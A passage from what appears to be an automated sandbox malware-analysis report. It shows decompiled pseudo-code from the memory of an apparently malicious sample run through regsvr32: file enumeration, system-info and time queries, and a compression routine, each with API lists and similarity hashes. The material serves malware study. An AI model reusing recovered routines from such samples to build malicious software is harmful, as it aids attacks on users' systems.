                                                                                                                                                                        					_t61 = 0;
                                                                                                                                                                        					do {
                                                                                                                                                                        						_t7 = _t61 + 0x49ff924; // 0x0
                                                                                                                                                                        						_push( *_t7);
                                                                                                                                                                        						_push( &(_v608.cFileName));
                                                                                                                                                                        						_t41 =  *0x49ff824; // 0x4befb78
                                                                                                                                                                        						if( *((intOrPtr*)(_t41 + 0x18))() == 0) {
                                                                                                                                                                        							goto L8;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t45 = E049F0015(_t75, _t48,  &_v608, _a16);
                                                                                                                                                                        						_t63 = _t63 + 0xc;
                                                                                                                                                                        						if(_t45 == 0) {
                                                                                                                                                                        							break;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t46 =  *0x49ff818; // 0x4bef8b0
                                                                                                                                                                        						 *((intOrPtr*)(_t46 + 0xc0))(1);
                                                                                                                                                                        						L8:
                                                                                                                                                                        						_t61 = _t61 + 4;
                                                                                                                                                                        					} while (_t61 < 4);
                                                                                                                                                                        					if((_v608.dwFileAttributes & 0x00000010) == 0) {
                                                                                                                                                                        						goto L12;
                                                                                                                                                                        					}
                                                                                                                                                                        					goto L10;
                                                                                                                                                                        					L12:
                                                                                                                                                                        				} while (FindNextFileW(_t59,  &_v608) != 0);
                                                                                                                                                                        				_t31 =  *0x49ff818; // 0x4bef8b0
                                                                                                                                                                        				 *((intOrPtr*)(_t31 + 0x80))(_t59);
                                                                                                                                                                        				goto L14;
                                                                                                                                                                        			}




















                                                                                                                                                                        APIs
                                                                                                                                                                        • FindFirstFileW.KERNEL32(00000000,?,?,00000000,00000000), ref: 049EBD2D
                                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 049EBE10
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileFind$FirstNext
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1690352074-0
                                                                                                                                                                        • Opcode ID: c93e7063b7e6544bba701011740c773330816712a74fddc74db945ef4c56a8cc
                                                                                                                                                                        • Instruction ID: c9d7f507f328a26820ff8ff68df1b93144af08e358fc57fb289820b843c076cd
                                                                                                                                                                        • Opcode Fuzzy Hash: c93e7063b7e6544bba701011740c773330816712a74fddc74db945ef4c56a8cc
                                                                                                                                                                        • Instruction Fuzzy Hash: E031B672B00215AFEB21DB66DC89FBA37ACEB44714F040175FA15AB1C1EA71F941CBA4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,049E52C8), ref: 049EA072
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Time$FileSystem
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2086374402-0
                                                                                                                                                                        • Opcode ID: a82e6b4e221220073db00d7f8785622af2856180965521efabeec798e9c3c94f
                                                                                                                                                                        • Instruction ID: 2a3d5ed8fc7d2519a554d55a887a32ccf8a94ad76ff20742823488e3daa98eaa
                                                                                                                                                                        • Opcode Fuzzy Hash: a82e6b4e221220073db00d7f8785622af2856180965521efabeec798e9c3c94f
                                                                                                                                                                        • Instruction Fuzzy Hash: E3E01AB69003186FDB10AE689D05BAABAACEB80A14F154964AC45A7244E670AE448690
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E049EDD62(void* __ecx) {
                                                                                                                                                                        				struct _SYSTEM_INFO _v40;
                                                                                                                                                                        				void* _t5;
                                                                                                                                                                        
                                                                                                                                                                        				if(__ecx == 0) {
                                                                                                                                                                        					GetSystemInfo( &_v40);
                                                                                                                                                                        					return _v40.dwOemId & 0x0000ffff;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t5 = 9;
                                                                                                                                                                        					return _t5;
                                                                                                                                                                        				}
                                                                                                                                                                        			}






                                                                                                                                                                        APIs
                                                                                                                                                                        • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,049EE13B), ref: 049EDD75
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InfoSystem
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 31276548-0
                                                                                                                                                                        • Opcode ID: 1ac2737cab4e3fb0c02fd0b430a7016bd4416f0ffd24381d1bfd68a9deb6d94b
                                                                                                                                                                        • Instruction ID: 68164a13683f1999078bcd2cc439cade3b82fdf39dae5b56c16574ce882dd770
                                                                                                                                                                        • Opcode Fuzzy Hash: 1ac2737cab4e3fb0c02fd0b430a7016bd4416f0ffd24381d1bfd68a9deb6d94b
                                                                                                                                                                        • Instruction Fuzzy Hash: 32C022A160020A06CF0097A261167AA32FC5B04208F1001A0EC02F00C0E550EC808260
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 99%
                                                                                                                                                                        			E049F8240(intOrPtr _a4, signed int _a8, signed int _a12) {
                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                        				signed short* _v12;
                                                                                                                                                                        				char _v16;
                                                                                                                                                                        				signed short _v20;
                                                                                                                                                                        				unsigned int _v24;
                                                                                                                                                                        				signed short _v28;
                                                                                                                                                                        				signed int _t223;
                                                                                                                                                                        				signed int _t235;
                                                                                                                                                                        				signed int _t237;
                                                                                                                                                                        				signed short _t240;
                                                                                                                                                                        				signed int _t241;
                                                                                                                                                                        				signed short _t244;
                                                                                                                                                                        				signed int _t245;
                                                                                                                                                                        				signed short _t248;
                                                                                                                                                                        				signed int _t249;
                                                                                                                                                                        				signed int _t250;
                                                                                                                                                                        				void* _t254;
                                                                                                                                                                        				signed char _t259;
                                                                                                                                                                        				signed int _t275;
                                                                                                                                                                        				signed int _t289;
                                                                                                                                                                        				signed int _t308;
                                                                                                                                                                        				signed short _t316;
                                                                                                                                                                        				signed int _t321;
                                                                                                                                                                        				void* _t329;
                                                                                                                                                                        				signed short _t330;
                                                                                                                                                                        				signed short _t333;
                                                                                                                                                                        				signed short _t334;
                                                                                                                                                                        				signed short _t343;
                                                                                                                                                                        				signed short _t346;
                                                                                                                                                                        				signed short _t347;
                                                                                                                                                                        				signed short _t348;
                                                                                                                                                                        				signed short _t358;
                                                                                                                                                                        				signed short _t361;
                                                                                                                                                                        				signed short _t362;
                                                                                                                                                                        				signed short _t363;
                                                                                                                                                                        				signed short _t370;
                                                                                                                                                                        				signed int _t373;
                                                                                                                                                                        				signed int _t378;
                                                                                                                                                                        				signed short _t379;
                                                                                                                                                                        				signed short _t382;
                                                                                                                                                                        				unsigned int _t388;
                                                                                                                                                                        				unsigned short _t390;
                                                                                                                                                                        				unsigned short _t392;
                                                                                                                                                                        				unsigned short _t394;
                                                                                                                                                                        				signed int _t396;
                                                                                                                                                                        				signed int _t397;
                                                                                                                                                                        				signed int _t398;
                                                                                                                                                                        				signed int _t400;
                                                                                                                                                                        				signed short _t401;
                                                                                                                                                                        				signed int _t402;
                                                                                                                                                                        				signed int _t403;
                                                                                                                                                                        				signed int _t407;
                                                                                                                                                                        				signed int _t409;
                                                                                                                                                                        
                                                                                                                                                                        				_t223 = _a8;
                                                                                                                                                                        				_t235 =  *(_t223 + 2) & 0x0000ffff;
                                                                                                                                                                        				_push(_t397);
                                                                                                                                                                        				_t388 = 0;
                                                                                                                                                                        				_t398 = _t397 | 0xffffffff;
                                                                                                                                                                        				if(_a12 < 0) {
                                                                                                                                                                        					L42:
                                                                                                                                                                        					return _t223;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t329 =  !=  ? 7 : 0x8a;
                                                                                                                                                                        					_v12 = _t223 + 6;
                                                                                                                                                                        					_t254 = (0 | _t235 != 0x00000000) + 3;
                                                                                                                                                                        					_v16 = _a12 + 1;
                                                                                                                                                                        					do {
                                                                                                                                                                        						_v24 = _t388;
                                                                                                                                                                        						_t388 = _t388 + 1;
                                                                                                                                                                        						_a8 = _t235;
                                                                                                                                                                        						_a12 = _t235;
                                                                                                                                                                        						_v8 =  *_v12 & 0x0000ffff;
                                                                                                                                                                        						_t223 = _a4;
                                                                                                                                                                        						if(_t388 >= _t329) {
                                                                                                                                                                        							L4:
                                                                                                                                                                        							if(_t388 >= _t254) {
                                                                                                                                                                        								if(_a8 == 0) {
                                                                                                                                                                        									_t122 = _t223 + 0x16bc; // 0xfed1e900
                                                                                                                                                                        									_t400 =  *_t122;
                                                                                                                                                                        									if(_t388 > 0xa) {
                                                                                                                                                                        										_t168 = _t223 + 0xac4; // 0x1cfde808
                                                                                                                                                                        										_t330 =  *_t168 & 0x0000ffff;
                                                                                                                                                                        										_t169 = _t223 + 0xac6; // 0x1cfd
                                                                                                                                                                        										_t237 =  *_t169 & 0x0000ffff;
                                                                                                                                                                        										_v24 = _t330;
                                                                                                                                                                        										_t171 = _t223 + 0x16b8; // 0x105bb
                                                                                                                                                                        										_t333 = (_t330 << _t400 |  *_t171) & 0x0000ffff;
                                                                                                                                                                        										_v28 = _t333;
                                                                                                                                                                        										if(_t400 <= 0x10 - _t237) {
                                                                                                                                                                        											_t259 = _t400 + _t237;
                                                                                                                                                                        										} else {
                                                                                                                                                                        											_t173 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                        											 *(_t223 + 0x16b8) = _t333;
                                                                                                                                                                        											_t175 = _t223 + 8; // 0x8d000040
                                                                                                                                                                        											 *((char*)( *_t175 +  *_t173)) = _v28;
                                                                                                                                                                        											_t223 = _a4;
                                                                                                                                                                        											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                        											_t181 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                        											_t182 = _t223 + 8; // 0x8d000040
                                                                                                                                                                        											_t183 = _t223 + 0x16b9; // 0x105
                                                                                                                                                                        											 *((char*)( *_t181 +  *_t182)) =  *_t183;
                                                                                                                                                                        											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                        											_t333 = _v24 >> 0x10;
                                                                                                                                                                        											_t189 = _t223 + 0x16bc; // 0xfed1e900
                                                                                                                                                                        											_t259 =  *_t189 + 0xfffffff0 + _t237;
                                                                                                                                                                        										}
                                                                                                                                                                        										_t334 = _t333 & 0x0000ffff;
                                                                                                                                                                        										 *(_t223 + 0x16bc) = _t259;
                                                                                                                                                                        										 *(_t223 + 0x16b8) = _t334;
                                                                                                                                                                        										_t401 = _t334 & 0x0000ffff;
                                                                                                                                                                        										if(_t259 <= 9) {
                                                                                                                                                                        											_t209 = _t388 - 0xb; // -10
                                                                                                                                                                        											 *(_t223 + 0x16b8) = _t209 << _t259 | _t401;
                                                                                                                                                                        											 *(_t223 + 0x16bc) = _t259 + 7;
                                                                                                                                                                        										} else {
                                                                                                                                                                        											_t193 = _t223 + 8; // 0x8d000040
                                                                                                                                                                        											_t390 = _t388 + 0xfffffff5;
                                                                                                                                                                        											_t194 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                        											_t240 = _t390 << _t259 | _t401;
                                                                                                                                                                        											 *(_t223 + 0x16b8) = _t240;
                                                                                                                                                                        											 *( *_t193 +  *_t194) = _t240;
                                                                                                                                                                        											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                        											_t199 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                        											_t200 = _t223 + 8; // 0x8d000040
                                                                                                                                                                        											_t201 = _t223 + 0x16b9; // 0x105
                                                                                                                                                                        											 *((char*)( *_t199 +  *_t200)) =  *_t201;
                                                                                                                                                                        											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                        											 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff7;
                                                                                                                                                                        											 *(_t223 + 0x16b8) = _t390 >> 0x10;
                                                                                                                                                                        										}
                                                                                                                                                                        										goto L35;
                                                                                                                                                                        									}
                                                                                                                                                                        									_t123 = _t223 + 0xac0; // 0x75ff0c75
                                                                                                                                                                        									_t343 =  *_t123 & 0x0000ffff;
                                                                                                                                                                        									_t124 = _t223 + 0xac2; // 0xe80875ff
                                                                                                                                                                        									_t241 =  *_t124 & 0x0000ffff;
                                                                                                                                                                        									_v24 = _t343;
                                                                                                                                                                        									_t126 = _t223 + 0x16b8; // 0x105bb
                                                                                                                                                                        									_t346 = (_t343 << _t400 |  *_t126) & 0x0000ffff;
                                                                                                                                                                        									_v28 = _t346;
                                                                                                                                                                        									if(_t400 > 0x10 - _t241) {
                                                                                                                                                                        										_t128 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                        										 *(_t223 + 0x16b8) = _t346;
                                                                                                                                                                        										_t130 = _t223 + 8; // 0x8d000040
                                                                                                                                                                        										 *((char*)( *_t130 +  *_t128)) = _v28;
                                                                                                                                                                        										_t223 = _a4;
                                                                                                                                                                        										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                        										_t136 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                        										_t137 = _t223 + 8; // 0x8d000040
                                                                                                                                                                        										_t138 = _t223 + 0x16b9; // 0x105
                                                                                                                                                                        										 *((char*)( *_t136 +  *_t137)) =  *_t138;
                                                                                                                                                                        										_t142 = _t223 + 0x16bc; // 0xfed1e900
                                                                                                                                                                        										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                        										_t346 = _v24 >> 0x10;
                                                                                                                                                                        										_t400 =  *_t142 + 0xfffffff0;
                                                                                                                                                                        									}
                                                                                                                                                                        									_t403 = _t400 + _t241;
                                                                                                                                                                        									_t347 = _t346 & 0x0000ffff;
                                                                                                                                                                        									 *(_t223 + 0x16bc) = _t403;
                                                                                                                                                                        									 *(_t223 + 0x16b8) = _t347;
                                                                                                                                                                        									_t348 = _t347 & 0x0000ffff;
                                                                                                                                                                        									if(_t403 <= 0xd) {
                                                                                                                                                                        										_t163 = _t403 + 3; // 0xfed1e903
                                                                                                                                                                        										_t275 = _t163;
                                                                                                                                                                        										L28:
                                                                                                                                                                        										 *(_t223 + 0x16bc) = _t275;
                                                                                                                                                                        										_t165 = _t388 - 3; // -2
                                                                                                                                                                        										_t166 = _t223 + 0x16b8; // 0x105bb
                                                                                                                                                                        										 *(_t223 + 0x16b8) = (_t165 << _t403 |  *_t166 & 0x0000ffff) & 0x0000ffff;
                                                                                                                                                                        									} else {
                                                                                                                                                                        										_t392 = _t388 + 0xfffffffd;
                                                                                                                                                                        										_t147 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                        										_t244 = _t392 << _t403 | _t348;
                                                                                                                                                                        										_t148 = _t223 + 8; // 0x8d000040
                                                                                                                                                                        										 *(_t223 + 0x16b8) = _t244;
                                                                                                                                                                        										 *( *_t148 +  *_t147) = _t244;
                                                                                                                                                                        										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                        										_t153 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                        										_t154 = _t223 + 8; // 0x8d000040
                                                                                                                                                                        										_t155 = _t223 + 0x16b9; // 0x105
                                                                                                                                                                        										 *((char*)( *_t153 +  *_t154)) =  *_t155;
                                                                                                                                                                        										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                        										 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff3;
                                                                                                                                                                        										 *(_t223 + 0x16b8) = _t392 >> 0x00000010 & 0x0000ffff;
                                                                                                                                                                        									}
                                                                                                                                                                        									goto L35;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t289 = _a12;
                                                                                                                                                                        								if(_t289 != _t398) {
                                                                                                                                                                        									_t53 = _t289 * 4; // 0x59000000
                                                                                                                                                                        									_t396 =  *(_t223 + _t53 + 0xa7e) & 0x0000ffff;
                                                                                                                                                                        									_t56 = _t235 * 4; // 0x35e8
                                                                                                                                                                        									_t370 =  *(_t223 + _t56 + 0xa7c) & 0x0000ffff;
                                                                                                                                                                        									_t58 = _t223 + 0x16bc; // 0xfed1e900
                                                                                                                                                                        									_t407 =  *_t58;
                                                                                                                                                                        									_v28 = _t370;
                                                                                                                                                                        									_t60 = _t223 + 0x16b8; // 0x105bb
                                                                                                                                                                        									_t249 = (_t370 << _t407 |  *_t60) & 0x0000ffff;
                                                                                                                                                                        									if(_t407 <= 0x10 - _t396) {
                                                                                                                                                                        										_t373 = _t249;
                                                                                                                                                                        										_t308 = _t407 + _t396;
                                                                                                                                                                        									} else {
                                                                                                                                                                        										_t61 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                        										_t62 = _t223 + 8; // 0x8d000040
                                                                                                                                                                        										 *(_t223 + 0x16b8) = _t249;
                                                                                                                                                                        										 *( *_t62 +  *_t61) = _t249;
                                                                                                                                                                        										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                        										_t67 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                        										_t68 = _t223 + 8; // 0x8d000040
                                                                                                                                                                        										_t69 = _t223 + 0x16b9; // 0x105
                                                                                                                                                                        										 *((char*)( *_t67 +  *_t68)) =  *_t69;
                                                                                                                                                                        										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                        										_t75 = _t223 + 0x16bc; // 0xfed1e900
                                                                                                                                                                        										_t373 = _v28 >> 0x00000010 & 0x0000ffff;
                                                                                                                                                                        										_t308 =  *_t75 + 0xfffffff0 + _t396;
                                                                                                                                                                        									}
                                                                                                                                                                        									_t388 = _v24;
                                                                                                                                                                        									 *(_t223 + 0x16bc) = _t308;
                                                                                                                                                                        									 *(_t223 + 0x16b8) = _t373;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t80 = _t223 + 0xabc; // 0xff177400
                                                                                                                                                                        								_t358 =  *_t80 & 0x0000ffff;
                                                                                                                                                                        								_t81 = _t223 + 0x16bc; // 0xfed1e900
                                                                                                                                                                        								_t402 =  *_t81;
                                                                                                                                                                        								_t82 = _t223 + 0xabe; // 0xc75ff17
                                                                                                                                                                        								_t245 =  *_t82 & 0x0000ffff;
                                                                                                                                                                        								_v24 = _t358;
                                                                                                                                                                        								_t84 = _t223 + 0x16b8; // 0x105bb
                                                                                                                                                                        								_t361 = (_t358 << _t402 |  *_t84) & 0x0000ffff;
                                                                                                                                                                        								_v28 = _t361;
                                                                                                                                                                        								if(_t402 > 0x10 - _t245) {
                                                                                                                                                                        									_t86 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                        									 *(_t223 + 0x16b8) = _t361;
                                                                                                                                                                        									_t88 = _t223 + 8; // 0x8d000040
                                                                                                                                                                        									 *((char*)( *_t88 +  *_t86)) = _v28;
                                                                                                                                                                        									_t223 = _a4;
                                                                                                                                                                        									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                        									_t94 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                        									_t95 = _t223 + 8; // 0x8d000040
                                                                                                                                                                        									_t96 = _t223 + 0x16b9; // 0x105
                                                                                                                                                                        									 *((char*)( *_t94 +  *_t95)) =  *_t96;
                                                                                                                                                                        									_t100 = _t223 + 0x16bc; // 0xfed1e900
                                                                                                                                                                        									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                        									_t361 = _v24 >> 0x10;
                                                                                                                                                                        									_t402 =  *_t100 + 0xfffffff0;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t403 = _t402 + _t245;
                                                                                                                                                                        								_t362 = _t361 & 0x0000ffff;
                                                                                                                                                                        								 *(_t223 + 0x16bc) = _t403;
                                                                                                                                                                        								 *(_t223 + 0x16b8) = _t362;
                                                                                                                                                                        								_t363 = _t362 & 0x0000ffff;
                                                                                                                                                                        								if(_t403 <= 0xe) {
                                                                                                                                                                        									_t121 = _t403 + 2; // 0xfed1e902
                                                                                                                                                                        									_t275 = _t121;
                                                                                                                                                                        									goto L28;
                                                                                                                                                                        								} else {
                                                                                                                                                                        									_t394 = _t388 + 0xfffffffd;
                                                                                                                                                                        									_t105 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                        									_t248 = _t394 << _t403 | _t363;
                                                                                                                                                                        									_t106 = _t223 + 8; // 0x8d000040
                                                                                                                                                                        									 *(_t223 + 0x16b8) = _t248;
                                                                                                                                                                        									 *( *_t106 +  *_t105) = _t248;
                                                                                                                                                                        									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                        									_t111 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                        									_t112 = _t223 + 8; // 0x8d000040
                                                                                                                                                                        									_t113 = _t223 + 0x16b9; // 0x105
                                                                                                                                                                        									 *((char*)( *_t111 +  *_t112)) =  *_t113;
                                                                                                                                                                        									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                        									 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff2;
                                                                                                                                                                        									 *(_t223 + 0x16b8) = _t394 >> 0x00000010 & 0x0000ffff;
                                                                                                                                                                        									goto L35;
                                                                                                                                                                        								}
                                                                                                                                                                        							} else {
                                                                                                                                                                        								_t316 = _t223 + (_t235 + 0x29f) * 4;
                                                                                                                                                                        								_v28 = _t316;
                                                                                                                                                                        								do {
                                                                                                                                                                        									_t378 = _a12;
                                                                                                                                                                        									_t22 = _t223 + 0x16bc; // 0xfed1e900
                                                                                                                                                                        									_t409 =  *_t22;
                                                                                                                                                                        									_t24 = _t378 * 4; // 0x59000000
                                                                                                                                                                        									_t250 =  *(_t223 + _t24 + 0xa7e) & 0x0000ffff;
                                                                                                                                                                        									_t379 =  *_t316 & 0x0000ffff;
                                                                                                                                                                        									_v24 = _t379;
                                                                                                                                                                        									_t27 = _t223 + 0x16b8; // 0x105bb
                                                                                                                                                                        									_t382 = (_t379 << _t409 |  *_t27) & 0x0000ffff;
                                                                                                                                                                        									_v20 = _t382;
                                                                                                                                                                        									if(_t409 <= 0x10 - _t250) {
                                                                                                                                                                        										_t321 = _t409 + _t250;
                                                                                                                                                                        									} else {
                                                                                                                                                                        										_t29 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                        										 *(_t223 + 0x16b8) = _t382;
                                                                                                                                                                        										_t31 = _t223 + 8; // 0x8d000040
                                                                                                                                                                        										 *((char*)( *_t31 +  *_t29)) = _v20;
                                                                                                                                                                        										_t223 = _a4;
                                                                                                                                                                        										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                        										_t37 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                        										_t38 = _t223 + 8; // 0x8d000040
                                                                                                                                                                        										_t39 = _t223 + 0x16b9; // 0x105
                                                                                                                                                                        										 *((char*)( *_t37 +  *_t38)) =  *_t39;
                                                                                                                                                                        										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                        										_t382 = _v24 >> 0x10;
                                                                                                                                                                        										_t45 = _t223 + 0x16bc; // 0xfed1e900
                                                                                                                                                                        										_t321 =  *_t45 + 0xfffffff0 + _t250;
                                                                                                                                                                        									}
                                                                                                                                                                        									 *(_t223 + 0x16bc) = _t321;
                                                                                                                                                                        									_t316 = _v28;
                                                                                                                                                                        									 *(_t223 + 0x16b8) = _t382 & 0x0000ffff;
                                                                                                                                                                        									_t388 = _t388 - 1;
                                                                                                                                                                        								} while (_t388 != 0);
                                                                                                                                                                        								L35:
                                                                                                                                                                        								_t235 = _v8;
                                                                                                                                                                        								_t388 = 0;
                                                                                                                                                                        								_t398 = _a12;
                                                                                                                                                                        								if(_t235 != 0) {
                                                                                                                                                                        									if(_a8 != _t235) {
                                                                                                                                                                        										_t329 = 7;
                                                                                                                                                                        										_t217 = _t329 - 3; // 0x4
                                                                                                                                                                        										_t254 = _t217;
                                                                                                                                                                        									} else {
                                                                                                                                                                        										_t329 = 6;
                                                                                                                                                                        										_t216 = _t329 - 3; // 0x3
                                                                                                                                                                        										_t254 = _t216;
                                                                                                                                                                        									}
                                                                                                                                                                        								} else {
                                                                                                                                                                        									_t329 = 0x8a;
                                                                                                                                                                        									_t214 = _t388 + 3; // 0x3
                                                                                                                                                                        									_t254 = _t214;
                                                                                                                                                                        								}
                                                                                                                                                                        								goto L41;
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        						_t223 = _a4;
                                                                                                                                                                        						if(_t235 == _v8) {
                                                                                                                                                                        							_t235 = _v8;
                                                                                                                                                                        							goto L41;
                                                                                                                                                                        						}
                                                                                                                                                                        						goto L4;
                                                                                                                                                                        						L41:
                                                                                                                                                                        						_v12 =  &(_v12[2]);
                                                                                                                                                                        						_t221 =  &_v16;
                                                                                                                                                                        						 *_t221 = _v16 - 1;
                                                                                                                                                                        					} while ( *_t221 != 0);
                                                                                                                                                                        					goto L42;
                                                                                                                                                                        				}
                                                                                                                                                                        			}
























































                                                                                                                                                                        0x049f8375
                                                                                                                                                                        0x049f8375
                                                                                                                                                                        0x049f837d
                                                                                                                                                                        0x049f837d
                                                                                                                                                                        0x049f8385
                                                                                                                                                                        0x049f8385
                                                                                                                                                                        0x049f838d
                                                                                                                                                                        0x049f839a
                                                                                                                                                                        0x049f83a3
                                                                                                                                                                        0x049f83a8
                                                                                                                                                                        0x049f83ed
                                                                                                                                                                        0x049f83ef
                                                                                                                                                                        0x049f83aa
                                                                                                                                                                        0x049f83aa
                                                                                                                                                                        0x049f83ad
                                                                                                                                                                        0x049f83b0
                                                                                                                                                                        0x049f83b7
                                                                                                                                                                        0x049f83ba
                                                                                                                                                                        0x049f83bd
                                                                                                                                                                        0x049f83c0
                                                                                                                                                                        0x049f83c3
                                                                                                                                                                        0x049f83c9
                                                                                                                                                                        0x049f83d7
                                                                                                                                                                        0x049f83dd
                                                                                                                                                                        0x049f83e6
                                                                                                                                                                        0x049f83e9
                                                                                                                                                                        0x049f83e9
                                                                                                                                                                        0x049f83f2
                                                                                                                                                                        0x049f83f5
                                                                                                                                                                        0x049f83fb
                                                                                                                                                                        0x049f83fb
                                                                                                                                                                        0x049f8402
                                                                                                                                                                        0x049f8402
                                                                                                                                                                        0x049f8409
                                                                                                                                                                        0x049f8409
                                                                                                                                                                        0x049f8411
                                                                                                                                                                        0x049f8411
                                                                                                                                                                        0x049f8418
                                                                                                                                                                        0x049f8425
                                                                                                                                                                        0x049f842e
                                                                                                                                                                        0x049f8431
                                                                                                                                                                        0x049f8436
                                                                                                                                                                        0x049f8438
                                                                                                                                                                        0x049f843b
                                                                                                                                                                        0x049f8442
                                                                                                                                                                        0x049f8448
                                                                                                                                                                        0x049f844b
                                                                                                                                                                        0x049f844e
                                                                                                                                                                        0x049f8451
                                                                                                                                                                        0x049f8454
                                                                                                                                                                        0x049f8457
                                                                                                                                                                        0x049f845d
                                                                                                                                                                        0x049f846b
                                                                                                                                                                        0x049f8471
                                                                                                                                                                        0x049f8474
                                                                                                                                                                        0x049f8477
                                                                                                                                                                        0x049f8477
                                                                                                                                                                        0x049f847a
                                                                                                                                                                        0x049f847c
                                                                                                                                                                        0x049f847f
                                                                                                                                                                        0x049f8485
                                                                                                                                                                        0x049f848c
                                                                                                                                                                        0x049f8492
                                                                                                                                                                        0x049f84eb
                                                                                                                                                                        0x049f84eb
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f8494
                                                                                                                                                                        0x049f8494
                                                                                                                                                                        0x049f849f
                                                                                                                                                                        0x049f84a2
                                                                                                                                                                        0x049f84a5
                                                                                                                                                                        0x049f84a8
                                                                                                                                                                        0x049f84af
                                                                                                                                                                        0x049f84b2
                                                                                                                                                                        0x049f84b5
                                                                                                                                                                        0x049f84b8
                                                                                                                                                                        0x049f84bb
                                                                                                                                                                        0x049f84c1
                                                                                                                                                                        0x049f84cd
                                                                                                                                                                        0x049f84d2
                                                                                                                                                                        0x049f84df
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f84df
                                                                                                                                                                        0x049f82b4
                                                                                                                                                                        0x049f82ba
                                                                                                                                                                        0x049f82bd
